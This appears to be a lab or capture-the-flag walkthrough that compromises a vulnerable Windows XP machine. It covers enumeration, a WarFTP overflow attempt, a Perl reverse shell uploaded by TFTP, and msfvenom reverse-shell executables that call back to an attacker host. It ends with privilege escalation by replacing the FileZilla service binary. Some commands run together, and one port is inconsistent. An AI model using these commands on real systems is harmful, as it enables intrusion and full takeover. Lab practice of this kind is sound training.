This website uses ‘cookies’ to give you the best, most relevant experience. Using this website means you’re happy with…
- Network discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.28.
2. Port scan
nmap -Pn 10.0.2.28nmap -Pn -p1000- 10.0.2.28
There’re 4 open ports: 21, 22, 23, and 80.
3. OS and service scan
nmap -A -p21,22,23,80 10.0.2.28
There’re services as listed:
- Port 21 WAR-FTPD 1.65 w/ anonymous login
- Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
- Port 23 telnet
- Port 80 Tinyweb httpd 1.93
4. Vuln scan
nmap --script vuln -p21,22,23,80 10.0.2.28
No useful information.
Service Enumeration and exploitation
ftp 10.0.2.28Name: anonymousPassword: (empty)
Explore its directory
ls -laget bin
I don’t have any permission except READ.
cd /binls -la
TINY.EXE indicates that this /bin may related to Tinyweb httpd service.
cd ../logls -la
There’re logs and the interesting one is OpenTFTPServerMT.log. This indicates that there may be running TFTP on this machine.
cd ../rootls -la
There’re index.html and cgi-bin. This may mean that this directory is storing data for Tinyweb httpd.
cd cgi-binls -la
No data here.
Next is to search for a public exploit script.
After searching for any exploits w/ google, I came across this.
Offensive Security’s Exploit Database Archive
WarFTP 1.65 — ‘USER’ Remote Buffer Overflow. CVE-34041CVE-2007–1567 . remote exploit for Windows platform
When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.
To compile the script w/ Linux, in my experience, I always encounter many problems using Linux command line. So, I will use wine to install Dev-C, compile the script w/ Dev-C to get exe file, and finally run the exe w/ wine again.
First, download Orwell dev-c
Orwell Dev C++ 5.7.1
Orwell Dev C++ free download. Get the latest version now. Orwell Dev-C++ is a Integrated Development Environment (IDE)…
wine Orwell\ Dev\ C++_5.7.1_Soft32.exe
Continue installation process as same as Windows
Copy the code
Compile, I encountered errors.
After googling, I found that I need to add “-lws2_32” to the compiler option.
Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.
Compile again, now I got an exe file.
Run the exe w/ wine
Supply an option. Since the target system is XP sp3, I’ll use any options which are closest to the target.
wine 3570.exe 10.0.2.28 5
Connect to port 7777
telnet 10.0.2.28 7777
Use another option
wine 3570.exe 10.0.2.28 13
Connect to port 7777
telnet 10.0.2.28 7777
I also found another python script that was tested on Windows XP SP3. I’ll try to use this.
You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
Read the script
I have to create new shellcode to match my machine. Here is my command.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
Copy new shellcode to the python script and edit target IP.
Create Listener on port 443
rlwrap nc -lvp 443
Run the script
Back to the listener, no shell. I’ll proceed to the next service
No matching key exchange found. Cannot connect.
Specify algorithm and encryption method
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc 10.0.2.28
Now I can connect.
Search for public exploits
Open metasploit and search for exploits
use 2show options
set RHOST 10.0.2.28set LHOST 10.0.2.27set LPORT 443run -j
Failed. I’ll proceed to the next service.
telnet 10.0.2.28 23
I don’t have any credentials.
Access the site
View page source
nikto -h http://10.0.2.28
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q
5. Remember from FTP enumeration that there’s the TFTP log. It’s file transfer protocol based on UDP port 69. I’ll scan for open UDP port
nmap -sU -sV 10.0.2.28 -vvvv
There’s open UDP port 69.
Remember from FTP enumeration, reverse shell perl script can be uploaded to cgi-bin.
I’ll upload test.txt, first I’ll change TFTP to binary mode
mode binaryput test.txt root/cgi-bin -> failedput test.txt /cgi-bin -> failedput test.txt cgi-bin/ -> failedput test.txt cgi-bin/test.txt -> succeeded
Now access /cgi-bin/test.txt
I can upload the file, but I cannot run.
Next is uploading perl “Hello World” script from this guide
A First Perl CGI Script
Next: Exectiion of CGI Programs Up: Beginning CGI Programming in Previous: CGI Script Output Let us now look at how we…
put helloworld.pl cgi-bin/helloworld.pl -> succeeded
Access via http
- Prepare listener on port 443
rlwrap nc -lvp 443
2. Create reverse shell script, I used this guide
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
Copy only the perl code and edit IP and port to match your listener
put exploit.pl cgi-bin/exploit.pl
Access it, there’s an error.
I edit the script as shown in the snapshot.
put exploit.pl cgi-bin/exploit2.pl
3. Back to listener, now I got the shell
4. Verify the shell
- List system info
This machine is 32-bit.
2. List system task
tasklist /FI "username eq SYSTEM"
I will replace an exe file w/ reverse shell. I’ll start w/ “FileZilla server.exe” because I don't have any permission except READ.
Let’s change directory to “\”
I could not change as expected. I need more reliable shell.
2. Create and upload another shell
Create listener on port 80
rlwrap nc -lvp 80
Create exe shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell.exe
Upload it w/ tftp
put shell.exe cgi-bin/shell.exe
Run the shell w/ listener on port 443
Back to listener om port 80, I got another shell
3. Replacing filezilla
On listener port 80
Find filezilla.exe path
dir "FileZilla server.exe" /s /b
Find task name
net stop "FileZilla Server FTP server"
Next is replacing another reverse shell
Back to attacker machine, create exe reverse shell on port 21
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e x86/shikata_ga_nai -f exe > shell2.exe
Upload w/ tftp
put shell2.exe cgi-bin/shell2.exe
Create listener on port 21
rlwrap nc -lvp 21
Back to shell/listener on port 21
cd \Program Files\FileZilla Server\dir
rename old exe file to be backup
rename "FileZilla server.exe" "FileZilla server.exe.bak"dir
Copy shell2.exe to replace filezilla
copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"dir
Start Filezilla task
net start "FileZilla Server FTP server"
Back to listener on port 21, judging by the path, I’m administrator (root).